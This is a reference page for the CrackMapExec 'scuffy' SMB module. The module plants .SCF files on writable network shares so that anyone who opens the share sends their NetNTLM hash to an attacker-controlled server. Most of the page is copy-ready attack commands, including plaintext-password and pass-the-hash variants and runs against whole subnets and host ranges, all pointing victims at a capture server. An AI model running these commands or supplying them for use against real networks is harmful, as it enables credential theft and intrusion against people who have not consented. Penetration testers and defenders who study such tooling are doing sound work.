CrackMapExec Scuffy (smb)
This page contains detailed information about how to use the scuffy CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module creates a .SCF file on all remote writeable shares. The .SCF file contains an icon property with a UNC path pointing to an arbitrary SERVER location (ideally the attacker's machine). Afterwards, anyone who visits the shared folder (with the .SCF file inside) will automatically try to authenticate against the specified SERVER and send NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. by using Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.
The scuffy module is OPSEC unsafe which means that it may touch the disk and therefore can trigger an alarm.
Supported Protocols
- smb
Module Source Code
Authors
Module Options
Here is a complete list of scuffy module options:
# cme smb -M scuffy --options
[*] scuffy module options:
SERVER IP of the SMB server
NAME SCF file name
CLEANUP Cleanup (choices: True or False)
The SERVER and NAME options are required! Make sure to set them when using this module.
Module Usage
This is how to use the scuffy module while using the smb protocol:
Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M scuffy -o SERVER=<host> -o NAME=<name>
Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M scuffy -o SERVER=10.0.6.11 -o NAME=test
Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test
CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:
# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M scuffy -o SERVER=10.0.6.11 -o NAME=test
The scuffy module can be also used against multiple hosts. Here's how to run it against multiple hosts:# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M scuffy -o SERVER=10.0.6.11 -o NAME=test
References
- https://room362.com/post/2016/smb-http-auth-capture-via-scf/
- https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/server/capture/smb
Version
This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.